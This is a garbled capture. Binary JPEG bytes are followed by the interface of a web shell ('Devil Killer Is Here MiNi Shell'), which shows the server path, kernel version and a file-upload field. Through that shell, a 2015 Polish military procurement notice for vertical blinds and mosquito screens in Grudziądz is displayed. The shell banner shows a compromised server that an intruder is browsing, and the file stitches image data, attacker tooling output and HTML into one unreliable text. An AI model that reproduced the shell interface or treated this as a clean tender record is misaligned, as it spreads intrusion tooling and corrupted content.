JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150710/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150710/102873-N-2015.html

<p class="kh_header"><b>Grudziądz: DOSTAWA I MONTAŻ ZASŁON TYPU VERTICALE ORAZ MOSKITIER RAMOWYCH - sprawa nr 80/2015</b><br>
<b>Numer ogłoszenia: 102873 - 2015; data zamieszczenia: 10.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 13 Wojskowy Oddział Gospodarczy (Jednostka Wojskowa 4503 ) , ul. Czwartaków 1, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 56 458 32 90, 458 32 00, faks 56 458 32 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.13wog.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa sektora finansów publicznych - wojsko..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA I MONTAŻ ZASŁON TYPU VERTICALE ORAZ MOSKITIER RAMOWYCH - sprawa nr 80/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zrealizowanie przez Wykonawcę dostaw i montaż zasłon typu Verticale oraz moskitier ramowych według zadań:
- Zadanie nr 1: Dostawa zasłon pionach typu Vertical (wraz z montażem)
- Zadanie nr 2: Dostawa moskitier (wraz z montażem)
Opis przedmiotu zamówienia według Wspólnego Słownika Zamówień:
CPV: 39515000-5, 39525500-3
2. Zamawiający przewiduje możliwość skorzystania z prawa opcji (art. 34 ust. 5 ustawy PZP) polegającego na możliwości zwiększenia podstawowego zakresu ilościowego przedmiotu zamówienia określonego co do asortymentu i ilości określonego w Opisie przedmiotu zamówienia stanowiącego (ZAKRES PODSTAWOWY)  - gwarantowany Wykonawcy, maksymalnie o ilości do 1.000 m2 Verticali, co stanowi (ZAKRES PRAWA OPCJI). Skorzystanie przez Zamawiającego z prawa opcji będzie miało zastosowanie w ramach zawartej umowy według cen jednostkowych określonych w umowie w wypadkach konieczności zabezpieczenia potrzeb bieżący Zamawiającego. Wykonawca zostanie poinformowany o powyższym na piśmie z co najmniej 14-dniowym wyprzedzeniem.
3. Opis przedmiotu zamówienia dla zasłon pionowych typu Verticale:
Przedmiot zamówienia stanowią okienne, wewnętrzne i pionowe zasłony typu Verticale wraz z kompletem szyn, mechanizmami oraz elementami niezbędnymi do prawidłowego montażu i poprawnego działania zgodnie z funkcją przeznaczenia
- Tkaniny zastosowane na lamele winny być o gramaturze minimum 206g na m2 oraz szerokości 127mm;
- Zasłony winny posiadać atest higieniczności i raport klasyfikacyjny na zachowanie się palenia wyrobów włókienniczych;
Użyte materiały i elementy mocujące oraz mechanizmy winny być nowe, czyste, bez błędów fabrycznych, wykonane w I gatunku;
Zastosowana szyna dostarczona w komplecie z zasłonami, będzie wykonana w kolorze białym,  o mechanizmie z przekładnią planetarną o spowolnionym obrocie umożliwiającą płynną regulację położenia pasków wokół własnej osi (1800);
Łańcuszek kulkowy sterujący winien być wykonany do wysokości parapetu danego okna;
Przedmiot zamówienia obejmuje również wykonanie prac w zakresie montażu w otworach okiennych, zdjęcie dotychczasowych zamocowanych zasłon, uporządkowania miejsca montażu po wszelkich wykonanych pracach;
Kolorystyka:
- Tkaniny na lamele będą jednobarwne z jasnym wzorem;
- W terminie do 3 dni od daty podpisania umowy Wykonawca przedstawi wzorniki kolorystyczne tkanin. W proponowanej palecie kolorów do wyboru winny się znaleźć w szczególności kolory: szarości, beżu, bieli, odcienie seledynu;
- Wybór kolorystyki następuje w cenie oferowanej dostawy wraz z montażem, wskazanej przez Wykonawcę w złożonej ofercie;
Wykonawca udziela gwarancji na przedmiot zamówienia na okres 24 miesięcy licząc od daty faktycznego i protokolarnego odbioru dostawy wraz z montażem zasłon typu Verticale przez Zamawiającego, w tym na: zasłony typu (Verticale), szyny i poszczególne elementy osłonno-mocujące; mechanizm z przekładnią planetarną; niezawodną pracę mechanizmu i wykonaną usługę montażu.
4. Opis przedmiotu zamówienia dla moskitier ramowych:
- Moskitiera ramowa wykonana w ramce białej aluminiowej, profil walcowany, malowana proszkowo w kolorze białym, narożniki z tworzywa konstrukcyjnego;
- Tkanina zastosowana na siatki powinna być wykonana z mocnego włókna szklanego o wymiarach oczek 1,2 x 1,2 mm, być odporna na zróżnicowane warunki atmosferyczne oraz powinna spełniać warunki zastosowania szczególnie w pomieszczeniach kuchennych;
- Użyte materiały i elementy mocujące winny być nowe, czyste, bez błędów fabrycznych, wykonane w I gatunku;
- Montaż moskitier ramowych powinien zostać przeprowadzony tak, aby zasłaniać cały otwór okienny, aby uniemożliwić przedostawanie się owadów do pomieszczeń. Montaż na rygle obrotowe z uwzględnieniem konieczności dostosowania metod montażu do różnego typu okien (PCV oraz okna drewniane);
- Przedmiot zamówienia obejmuje również wykonanie prac w zakresie montażu w otworach okiennych, uporządkowania miejsca montażu po wszelkich
wykonanych pracach;
Kolorystyka:
- siatka - kolor biały
5. Zamawiający zaleca, aby Wykonawca dokonał wizji lokalnej w pomieszczeniach realizacji przedmiotu zamówienia, w celu przygotowania rzeczywistej oferty cenowej, uwzględniającej wszelkie czynniki i uwarunkowania związane z montażem zasłon typu Verticale oraz moskitier ramowych.
1) wizja lokalna będzie mogła mieć miejsce w dni robocze od poniedziałku do piątku w godzinach 9.00-13.00;
2) o dokonanie wizji lokalnej należy zwracać się z pisemnym wnioskiem do Zamawiającego, który wyznaczy termin wizji lokalnej informując Wykonawcę o powyższym na piśmie (faks: 261 48 32 22 - numer sprawy 80-2015);
3) dokonania wizji lokalnej w miejscu wykonywania zamówienia może dokonać przedstawiciel Wykonawcy ubiegający się o udzielenie zamówienia, który udostępni imienne upoważnienie do reprezentowania Wykonawcy, oraz dowód tożsamości (kserokopia dokumentów winna być poświadczona za zgodność z oryginałem przez osobę upoważnioną do reprezentowania Wykonawcy);
4) z przeprowadzonej wizji lokalnej zostanie sporządzony protokół.
6. Szczegółowa realizacja zamówień odbywać się będzie na zasadach określonych w treści umowy.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.51.50.00-5, 39.52.55.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  nie żąda od Wykonawców składających ofertę, wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 1 PZP</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa 
w art. 22 ust. 1 pkt. 2 PZP</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 3 PZP</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 3 PZP</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 4 PZP</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia (art. 26 ust. 2b Ustawy) - w formie kopii dokumentów tych podmiotów poświadczonych za zgodność z oryginałem przez Wykonawcę lub te podmioty.
Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b Ustawy, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. W przypadku gdy Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcy winien w ofercie wskazać
części zamówienia, których wykonanie zamierza powierzyć podwykonawcom. lub / i Zamawiający żąda podania
przez Wykonawcę nazw (firm) podwykonawców, w sytuacji gdy Wykonawca powołuje się na zasoby tych
podwykonawców na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełnienia warunków udziału w
postępowaniu, o których mowa w art. 22 ust. 1. W przypadku, gdy Wykonawca nie wskaże w ofercie części
zamówienia, której wykonanie powierzy podwykonawcom Zamawiający uzna, że całość zamówienia wykona
samodzielnie. Wykonawca wraz z ofertą winien przedłożyć:Formularz ofertowy; Oświadczenie o spełnieniu
warunków udziału; Oświadczenie o braku podstaw do wykluczenia z postępowania; Wykaz części zamówienia,
które Wykonawca zamierza powierzyć do realizacji podwykonawcy;Informację o Wykonawcy;Oświadczenie o
przynależności / bądź nie przynależności do grupy kapitałowej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Czas realizacji zamówienia liczony od dnia podpisania umowy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 Ustawy przewiduje możliwość wprowadzenia zmian 
do treści zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w następującym zakresie:
1)	wysokości podatku VAT w zakresie przedmiotu zamówienia w wypadku ustawowych zmian 
w tym zakresie. Zmiana ta wymaga zachowania formy pisemnej (aneks) oraz pisemnego wniosku jednej ze Stron o zmianę wraz z uzasadnieniem;
2)	udziału podwykonawcy na etapie realizacji umowy w sytuacji, gdy Wykonawca nie przewidział jego udziału w treści oferty lub zmiany podwykonawcy na innego - w przypadku, kiedy Wykonawca określi go co do tożsamości w ofercie a nowy podwykonawca spełni wymagania dla fachowego wykonania powierzanych mu czynności lub części zamówienia zgodnie z umową (np. oświadczenie Wykonawcy, podwykonawcy);
3)	zmiany zakresu podwykonawstwa;
4)	zmiany podwykonawcy na innego lub rezygnacji z podwykonawcy uczestniczącego 
w realizacji umowy w sytuacji gdy wykonawca na etapie składania ofert wykazał podwykonawcę jako podmiot, na którego zasoby wykonawca powołał się, na zasadach określonych w art. 26 
ust. 2b, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1. Wykonawca w tej sytuacji będzie zobowiązany udowodnić Zamawiającemu, 
iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagane w trakcie postępowania o udzielenie zamówienia;
5)	zmiany miejsca realizacji przedmiotu zamówienia na inny - znajdujący się na terenie województwa kujawsko-pomorskiego przy zachowaniu cen jednostkowych określonych treścią umowy;
6)	zmniejszenia ilości przedmiotu zamówienia 
i proporcjonalnie wartości przedmiotu zamówienia w sytuacjach, których Zamawiający nie mógł przewidzieć przed podpisaniem umowy lub w sytuacji gdy z rzeczywistych pomiarów i wizji lokalnej dokonanej przez Wykonawcę wyniknie, iż liczba niezbędnych metrów2 dla realizacji przedmiotu zamówienia będzie mniejsza;
7)	zmiany przedmiotu zamówienia na przedmiot zamówienia innego producenta niż wskazany w ofercie przez Wykonawcę przy zachowaniu cen wskazanych w umowie, pod warunkiem, 
iż dostarczany przedmiot nie będzie gorszy w swych parametrach niż określony przez Zamawiającego.
Zmiany jak powyżej wymagają zachowania formy pisemnej (aneks, za wyjątkiem pkt. 5) oraz pisemnego wniosku jednej ze Stron o zmianę wraz z uzasadnieniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.13wog.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa Nr 4503
ul. Czwartaków 1, 86-300 Grudziądz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.07.2015 godzina 11:30, miejsce: - osobiście w siedzibie Zamawiającego - budynek nr 1, pokój nr 7 lub
- przesłanie na adres Zamawiającego tj.: Jednostka Wojskowa 4503, 86-300 Grudziądz, ul. Czwartaków 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Kopertę należy opisać hasłem: OFERTA PRZETARGOWA: DOSTAWA I MONTAŻ ZASŁON TYPU VERTICALE ORAZ MOSKITIER RAMOWYCH  - sprawa nr 80/2015 
nie otwierać do dnia 21.07.2015 r. godz. 12.00.
Na kopercie umieścić należy w postaci pieczęci firmowej lub odręcznego napisu  nazwę Wykonawcy i jego adres zgodnie z danymi rejestrowymi (ewidencyjnymi).
MIEJSCE ORAZ TERMIN SKŁADANIA I OTWARCIA OFERT.
Termin składania ofert - do dnia 21.07.2015 r. godz. 11.30.
Wykonawcy mogą składać oferty osobiście w siedzibie (kancelarii) Zamawiającego - budynek 
nr 1, pokój nr 7 lub przesłać na adres Zamawiającego tj.: Jednostka Wojskowa 4503, 86-300 Grudziądz, ul. Czwartaków 1. 
Oferta w terminie, o którym mowa w ust. 1, z dokładnością do wskazanej godziny i minuty musi być złożona w kancelarii Zamawiającego. Zamawiający nie przewiduje przyjmowania ofert 
na biurze przepustek. Wymóg ten dotyczy również przesyłek nadawanych za pośrednictwem firmy spedycyjnej lub kurierskiej.
Wykonawca dla zachowania terminu składania ofert winien uwzględnić czas niezbędny na wystawienie przez osobę pełniącą służbę w biurze przepustek, przepustki upoważniającej do wejścia do kancelarii Zamawiającego oraz czas niezbędny na przejście do kancelarii 
i złożenie oferty. 
Ofertę złożoną po terminie, wskazanym w ust. 1, Zamawiający niezwłocznie zwraca Wykonawcy.
Jawne otwarcie ofert nastąpi w siedzibie Zamawiającego - budynek nr 18, sala nr 02 - poziom kondygnacyjny -1 w dniu 21.07.2015 r. godz. 11.00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOSTAWA I MONTAŻ ZASŁON TYPU VERTICALE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowią okienne, wewnętrzne i pionowe zasłony typu (Verticale) wraz 
z kompletem szyn, mechanizmami oraz elementami niezbędnymi do prawidłowego montażu i poprawnego działania zgodnie z funkcją przeznaczenia;
Tkaniny zastosowane na lamele winny być o gramaturze minimum 206g/m2 oraz szerokości 127mm;
- Zasłony winny posiadać atest higieniczności i raport klasyfikacyjny na zachowanie się palenia wyrobów włókienniczych;
Użyte materiały i elementy mocujące oraz mechanizmy winny być nowe, czyste, bez błędów fabrycznych, wykonane w I gatunku;
Zastosowana szyna dostarczona w komplecie z zasłonami, będzie wykonana w kolorze białym, 
o mechanizmie z przekładnią planetarną o spowolnionym obrocie umożliwiającą płynną regulację położenia pasków wokół własnej osi (1800);
Łańcuszek kulkowy sterujący winien być wykonany do wysokości parapetu danego okna;
Przedmiot zamówienia obejmuje również wykonanie prac w zakresie montażu w otworach okiennych, zdjęcie dotychczasowych zamocowanych zasłon, uporządkowania miejsca montażu po wszelkich wykonanych pracach;
Kolorystyka:
- Tkaniny na lamele będą jednobarwne z jasnym wzorem;
- W terminie do 3 dni od daty podpisania umowy Wykonawca przedstawi wzorniki kolorystyczne tkanin. W proponowanej palecie kolorów do wyboru winny się znaleźć w szczególności kolory: szarości, beżu, bieli, odcienie seledynu;
- Wybór kolorystyki następuje w cenie oferowanej dostawy wraz z montażem, wskazanej przez Wykonawcę w złożonej ofercie;
Wykonawca udziela gwarancji na przedmiot zamówienia na okres 24 miesięcy licząc od daty faktycznego i protokolarnego odbioru dostawy wraz z montażem zasłon typu (Verticale) przez Zamawiającego, w tym na: zasłony typu (Verticale), szyny i poszczególne elementy osłonno-mocujące; mechanizm z przekładnią planetarną; niezawodną pracę mechanizmu i wykonaną usługę montażu.
Pełen metraż: 341,74.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.50.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia liczony od dnia podpisania umowy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA I MONTAŻ MOSKITIER RAMOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -	Moskitiera ramowa wykonana w ramce białej aluminiowej, profil walcowany, malowana proszkowo w kolorze białym, narożniki z tworzywa konstrukcyjnego;
-	Tkanina zastosowana na siatki powinna być wykonana z mocnego włókna szklanego 
o wymiarach oczek 1,2 x 1,2 mm, być odporna na zróżnicowane warunki atmosferyczne oraz powinna spełniać warunki zastosowania szczególnie w pomieszczeniach kuchennych;
-	Użyte materiały i elementy mocujące winny być nowe, czyste, bez błędów fabrycznych, wykonane w I gatunku;
-	Montaż moskitier ramowych powinien zostać przeprowadzony tak, aby zasłaniać cały otwór okienny, aby uniemożliwić przedostawanie się owadów do pomieszczeń. Montaż na rygle obrotowe z uwzględnieniem konieczności dostosowania metod montażu do różnego typu okien (PCV oraz okna drewniane);
-	Przedmiot zamówienia obejmuje również wykonanie prac w zakresie montażu w otworach okiennych, uporządkowania miejsca montażu po wszelkich wykonanych pracach;
Kolorystyka:
- siatka - kolor biały.</p></li>
